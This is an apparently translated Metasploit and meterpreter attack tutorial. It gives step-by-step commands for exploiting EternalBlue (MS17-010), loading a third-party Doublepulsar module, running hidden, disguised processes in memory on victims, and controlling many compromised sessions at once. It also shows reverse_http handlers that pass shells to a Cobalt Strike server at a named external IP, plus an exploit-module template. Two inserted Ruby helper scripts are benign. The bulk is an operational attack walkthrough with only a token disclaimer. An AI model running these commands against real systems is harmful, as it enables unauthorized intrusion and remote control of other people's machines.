Detailed msf - meterpreter - penetration testing tutorial
Foreword
This article is for learning and reference only and must not be used for anything illegal!
As we all know, msf is a recognized "artifact" (a tool of legendary power). When I was young I did not appreciate msf and always wanted to write programs myself.
Now I find that msf is very powerful and that you can build your own tooling on top of it.
msf is a framework. What does that mean? It can be used to carry out the whole process of a penetration attack: early reconnaissance (the laning phase), the mid-game attack (the team fight), and late-game control (pushing towers).
We can develop our own programs on msfconsole (your own hero), and those programs can use the modules in msf (your equipment).
Introduction to msfconsole
Metasploit is an open-source vulnerability detection tool that ships with exploits for hundreds of known software vulnerabilities and is updated frequently. It is a powerful penetration testing framework, dubbed by the security community the tool that "can hack the entire universe".
Five modules:
An exploit is an attack performed by an attacker or penetration tester that takes advantage of a security vulnerability in a system, application or service.
The payload is the code we want the target system to execute after it has been compromised.
Shellcode is a set of machine instructions run as the attack payload during exploitation, usually written in assembly language.
A module is a software code component used in the Metasploit framework; modules launch penetration attacks or perform auxiliary attack actions.
A listener is the Metasploit component that waits for incoming network connections.
How to use msfconsole: common commands
Using it directly to launch an attack:
# First use:
service postgresql start # start the database service
msfdb init # initialize the database
# Afterwards:
msfconsole # start Metasploit
# View the help options
help
# search - look up a vulnerability:
search ms08_067
# use - select the exploit:
use exploit/windows/smb/ms08_067_netapi
# show - list the target operating system versions this exploit can attack (targets):
show targets
# set - set the target parameter (xx is the index matching the victim machine's version):
set target xx
# set - set the rhost parameter (the IP address of the victim machine):
set rhost 192.168.xxx.xxx
# show - view the parameters:
show options
# launch the attack:
exploit
For the specific parameters, see the help output:
help
msfconsole hands-on attack
Since msfconsole is a tool for internal-network penetration, its results on the external network are unsatisfactory, and port forwarding and similar issues need to be considered.
For example:
On the internal network, a reverse shell can connect straight back to this machine's IP.
On the external network with port forwarding, the call-back IP is the external IP and the call-back port is the external port.
After the payload is uploaded and executed successfully, you obtain the target's meterpreter (a pseudo shell).
Take the EternalBlue vulnerability as an example.
Penetration process:
First, scan with msfconsole's smb module to check whether the vulnerability is present:
use auxiliary/scanner/smb/smb_ms17_010
If it is vulnerable, use the exploit module:
use exploit/windows/smb/ms17_010_eternalblue
show options
Set the target:
set rhost 192.168.148.137
# set the payload and other options
set lhost 192.168.148.134
set lport 4444
run
Result: (screenshot not reproduced). Viewing the session information: (screenshot not reproduced). ok
According to the online tutorials, the payloads are all 64-bit. If the target machine is 32-bit, the architecture will be wrong, and you need to download a new module and load it.
For how to load new modules and develop new modules, see the section "Loading external modules: follow-up to the hands-on ms17_010".
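The architecture mismatch described above is visible in the payload file itself. The following Ruby script is an added example written for this page, not code from the tutorial or from Metasploit: it reads the Machine field of a PE file so a payload's architecture can be checked against the target's before delivery. The helper names pe_arch, arch_matches? and fake_pe, and the minimal header that fake_pe builds, are this example's own constructions.

```ruby
# Added example, not code from the tutorial or from Metasploit: read the
# Machine field of a PE file so a payload's architecture can be compared with
# the target's before it is delivered. Helper names (pe_arch, arch_matches?,
# fake_pe) are this example's own.

# Machine values from the PE/COFF specification, mapped to the arch names
# msf uses in target and payload names.
PE_MACHINES = {
  0x014c => 'x86',     # IMAGE_FILE_MACHINE_I386
  0x8664 => 'x64',     # IMAGE_FILE_MACHINE_AMD64
  0x01c4 => 'armle',   # IMAGE_FILE_MACHINE_ARMNT
  0xaa64 => 'aarch64'  # IMAGE_FILE_MACHINE_ARM64
}.freeze

# Architecture of a PE image held in memory; raises ArgumentError for
# anything that is not a PE file.
def pe_arch(bytes)
  bytes = bytes.b
  raise ArgumentError, 'not an MZ executable' unless bytes.byteslice(0, 2) == 'MZ'
  raise ArgumentError, 'truncated DOS header' if bytes.bytesize < 0x40
  pe_offset = bytes.byteslice(0x3c, 4).unpack1('V')                # e_lfanew
  raise ArgumentError, 'missing PE signature' unless bytes.byteslice(pe_offset, 4) == "PE\0\0"
  machine = bytes.byteslice(pe_offset + 4, 2).to_s.unpack1('v')     # IMAGE_FILE_HEADER.Machine
  raise ArgumentError, 'truncated file header' if machine.nil?
  PE_MACHINES.fetch(machine) { format('unknown(0x%04x)', machine) }
end

# True when the payload's architecture is the one the target expects,
# e.g. 'x86' for the 32-bit machine mentioned in the text.
def arch_matches?(payload_bytes, target_arch)
  pe_arch(payload_bytes) == target_arch
end

# Constructed test input: a minimal DOS header whose e_lfanew points at a PE
# signature followed by an IMAGE_FILE_HEADER with the Machine field we
# choose. It is only a header, not a runnable program.
def fake_pe(machine)
  dos_header = 'MZ'.b + ("\0" * 0x3a).b + [0x40].pack('V')   # 0x40 bytes, e_lfanew = 0x40
  # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
  # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
  file_header = [machine, 0, 0, 0, 0, 0, 0].pack('vvVVVvv')
  dos_header + "PE\0\0".b + file_header
end

if $PROGRAM_NAME == __FILE__
  sample = ARGV[0] ? File.binread(ARGV[0]) : fake_pe(0x8664)
  puts "payload arch: #{pe_arch(sample)}"
end
```

Run it with the path of a generated exe (`ruby pe_arch.rb payload.exe`) or with no argument to inspect the constructed x64 header; 'x86' is what the 32-bit target in the text needs, 'x64' is what the downloaded payloads carried.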
Note:
By default, a session with no activity for 5 minutes (300 seconds) is killed. To prevent this, set
set SessionExpirationTimeout 0
(300 seconds is the default of the related SessionCommunicationTimeout option; SessionExpirationTimeout itself defaults to one week, and both accept 0 to disable the limit.)
After the penetration:
When targets are penetrated in batches and there are many sessions (the results of many successful attacks), the following operations are available:
# list the targets
sessions -l
# select a target
sessions -i id
# run a shell command on all sessions
sessions -c cmd
# run a meterpreter command on all sessions
sessions -C "meterpreter_cmd"
# return from the selected target to the console
background
# exit the session and close all meterpreters
exit
Loading external modules: follow-up to the hands-on ms17_010
If the payload reports an architecture error, as shown in Figure 4, you can use the module on GitHub:
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/
Download it to the root directory and unzip it, then copy the module into the exploits directory of your msf install.
If it is the msf bundled with Kali, copy it to:
/usr/share/metasploit-framework/modules/exploits/windows/smb
If it is msf installed separately on Linux, copy it to:
/opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb
Open msf and reload the modules:
reload_all
reload
use exploit/windows/smb/eternalblue_doublepulsar
show options
This exploit appears to have been built around Windows binaries, so there are problems running it on Linux; install wine32 and check that it works:
wine -h
Run the exploit:
exploit
An error is reported again, so try process-injection disguise:
set processinject explorer.exe
OK, the shell came back successfully.
meterpreter command execution
- upload: upload a file to the target. For example, uploading an exe into the target's c:\ls\ directory:
upload 1.exe c:\\ls\\
- download: download a file from any path on the target that the session's permissions allow. Usage: download <file path>, for example:
download c:\\ls\\1.exe
- sysinfo: display the remote host's system information, including computer name, operating system, architecture, language and so on.
- execute: run a program on the target host. Run cmd.exe hidden and interact with it directly through the meterpreter session:
execute -H -i -f cmd.exe
execute -H -m -d notepad.exe -f 1.exe -a "-o 2.txt"
# -d  process name shown on the target while executing (used as a disguise)
# -m  execute directly from memory
# -a "-o 2.txt"  arguments passed to 1.exe
- portfwd: port forwarding. Listen on local port yyyy and forward it to port zzzz on the target:
portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx
# check whether the given local port is open
netstat -an | grep "yyyy"
For more commands, enter help.
When RHOSTS is given several hosts, for example
show options
set RHOSTS 127.0.0.1 127.0.0.2
the exploit returns one shell per host, two in this case, and
sessions -i 9
interacts through meterpreter with the session that belongs to 127.0.0.2. Once inside the target, upload sometimes fails:
[-] Error running command upload: Rex::TimeoutError Operation timed out.
Causes include insufficient disk space, high network latency, and so on.
msfconsole development practice
Beyond basic use, you can also develop on msf: add modules, modify its code, and so on.
Browse the msfconsole directory:
| name | content |
|---|---|
| data | user interface code |
| documentation | documentation |
| external | source code such as meterpreter |
| lib | ruby library (so, to learn msf well, read a ruby tutorial) |
| modules | the various modules |
| plugins | various plug-ins, such as database connection plug-ins |
| scripts | scripts used by the meterpreter module |
| tools | miscellaneous tools and scripts |
The most important directory is modules, which holds the various modules; modules can call one another.
Write a module (an exp module as the example):
Ideas for writing an exp module
The real work of exploit development happens before the code is written; your language of choice is secondary. What you need to think about is the exploit itself, nothing else.
Fields of an exp module
| field | content |
|---|---|
| Name | vendor, software, faulting component, vulnerability type |
| Author | author |
| Description | notes |
| Platform | supported platforms, such as: win, linux, osx, unix, bsd |
| Targets | an array of systems, applications, settings or special configurations; the second element of each entry is where you store the target's metadata, such as specific offsets, gadgets and return addresses. When the user selects a target, its metadata is loaded, the "target index" is tracked, and the entry can be retrieved through the target method. |
| Payload | specifies how the payload should be encoded and generated. You can specify: Space, SaveRegisters, Prepend, PrependEncoder, BadChars, Append, AppendEncoder, MaxNops, MinNops, Encoder, Nop, EncoderType, EncoderOptions, ExtendedOptions, EncoderDontFallThrough. |
| DisclosureDate | public disclosure date |
| Arch | architecture |
| check | optional; the method called by the check command |
| exploit | the main method, the real exploit code |
Exp module example
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
      'Description'    => %q{
        Say something that the user might need to know
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Name' ],
      'References'     =>
        [
          [ 'URL', '' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'System or software version',
            {
              'Ret' => 0x41414141 # This will be available in `target.ret`
            }
          ]
        ],
      'Payload'        => {
        'BadChars' => "\x00"
      },
      'Arch'           => ARCH_ARMLE,
      'Privileged'     => false,
      'DisclosureDate' => "",
      'DefaultTarget'  => 0))
  end

  def check
    # For the check command
  end

  def exploit
    # Main function
  end
end
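To show how the fields in the table above are actually consumed, here is an added Ruby example that is not part of the tutorial and not Metasploit's own code. It keeps the same metadata shape as the template, resolves DefaultTarget into an object whose ret method returns the 'Ret' value (as the template's comment describes), lints the metadata for the mistakes that bite at load time, and reports the bytes in a payload that collide with BadChars. The helpers update_info, Target, resolve_target, lint and bad_char_hits are stand-ins written for this example (the real update_info lives inside Msf::Module); the platform list and the 0x41414141 placeholder come from the table and template above, and the addresses in SAMPLE_INFO are constructed.

```ruby
# Added example, not Metasploit's own code: a stand-alone Ruby sketch of how
# the metadata from the field table is consumed. update_info, Target,
# resolve_target, lint and bad_char_hits are toy stand-ins written for this
# example; the real framework does this inside Msf::Module and its encoders.

# Platforms listed in the field table above.
PLATFORMS = %w[win linux osx unix bsd].freeze

# Stand-in for Msf's update_info: lay the module's own metadata over whatever
# `info` the caller passed into initialize.
def update_info(info, overrides)
  info.merge(overrides)
end

# A 'Targets' entry [name, metadata] wrapped so that `target.ret` reads the
# 'Ret' value, as the template's comment describes.
Target = Struct.new(:name, :opts) do
  def ret
    opts['Ret']
  end
end

# Pick the target the way `set target <index>` does; DefaultTarget otherwise.
def resolve_target(info, index = info['DefaultTarget'])
  name, opts = info['Targets'].fetch(index)
  Target.new(name, opts)
end

# Problems that would surface when the module is loaded or run.
def lint(info)
  problems = []
  name = info['Name'].to_s
  problems << 'Name is empty or still the template placeholder' if name.strip.empty? || name.include?('[Vendor]')
  problems << "Platform #{info['Platform'].inspect} is not one of #{PLATFORMS.join(', ')}" unless PLATFORMS.include?(info['Platform'])
  problems << 'DisclosureDate is empty' if info['DisclosureDate'].to_s.empty?
  targets = info['Targets'] || []
  problems << 'Targets is empty' if targets.empty?
  idx = info['DefaultTarget']
  problems << "DefaultTarget #{idx.inspect} is out of range" unless idx.is_a?(Integer) && idx.between?(0, targets.size - 1)
  targets.each do |tname, opts|
    problems << "#{tname}: Ret is still the placeholder 0x41414141" if opts['Ret'] == 0x41414141
  end
  problems
end

# Offsets and values in a payload that collide with the module's BadChars.
# Metasploit's encoders exist to remove exactly these; here we only report.
def bad_char_hits(payload, bad_chars)
  forbidden = bad_chars.bytes
  payload.bytes.each_with_index.select { |byte, _| forbidden.include?(byte) }.map { |byte, i| [i, byte] }
end

# Constructed sample: the template's metadata with most placeholders filled in.
SAMPLE_INFO = update_info(
  { 'DefaultTarget' => 0 },
  'Name' => 'ExampleVendor ExampleApp Stack Buffer Overflow',
  'Platform' => 'win',
  'Targets' => [
    ['ExampleApp 1.0', { 'Ret' => 0x41414141 }],   # placeholder never replaced
    ['ExampleApp 1.1', { 'Ret' => 0x7c80ae40 }]    # constructed address
  ],
  'Payload' => { 'BadChars' => "\x00\x0a\x0d" },
  'Arch' => 'x86',
  'DisclosureDate' => '2024-01-01'
).freeze

if $PROGRAM_NAME == __FILE__
  puts "default target: #{resolve_target(SAMPLE_INFO).name}"
  lint(SAMPLE_INFO).each { |problem| puts "lint: #{problem}" }
end
```

The lint deliberately flags the template's own placeholders (the bracketed Name, the empty DisclosureDate, the 0x41414141 return address), because a module left in that state loads without complaint and only fails when it is run against a target.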
Load the module
Copy the rb module to
/opt/metasploit-framework/embedded/framework/modules/exploits/xxx(the folder name you chose)/xxx.rb(your file)
Open msf and reload the modules:
reload_all
reload
Then select it (module paths use the singular exploit/ prefix and omit the .rb extension):
use exploit/xxx(the folder name you chose)/xxx(your file)
msfconsole extension (used together with CS)
- Both Cobalt Strike and Metasploit are penetration tools, each with its own strengths. The former is better suited as a stable control platform, while the latter is better at the many kinds of detection, collection and vulnerability exploitation inside the internal network. Linking the two flexibly and letting them rely on each other improves the efficiency of a penetration test.
1. CS session handed to msf
1. CS brings a PC online.
2. Set up the msf listener:
# msfconsole
use exploit/multi/handler
# note that this is reverse_http, not TCP; in cs4.2 I did not find an outbound TCP option
set payload windows/meterpreter/reverse_http
set lhost 103.234.72.5
set lport 10086
show options
exploit
3. Set the listener in CS:
Right-click, choose spawn, and select this listener.
Go back to msf and you can see that the machine is online.
sessions -l # view all sessions
There are far more ways to use Cobalt Strike and Metasploit together. Each method has its own application scenarios in practice and needs to be explored and summarized.
2. msf session handed to CS
1. First, send the meterpreter obtained in msf to the background:
background
2. Then use exploit/windows/local/payload_inject to inject a new payload into the session. The specific commands are as follows:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
# the CS host address
set LHOST 103.234.72.5
# any listening port, but it must match the CS listener
set LPORT 84
# the meterpreter session to hand over
set session 2
# do not start a new handler
set DisablePayloadHandler true
You can see that the machine is already online on the CS side.
CS+MSF Summary
Detailed information collection during the test means different penetration routes; only by correlating and reusing information can the penetration results be magnified more effectively.
Summary
MSF can be thought of like the C language: by calling its libraries, you can complete all sorts of batch, high-impact, stable operations, and it is very easy to use!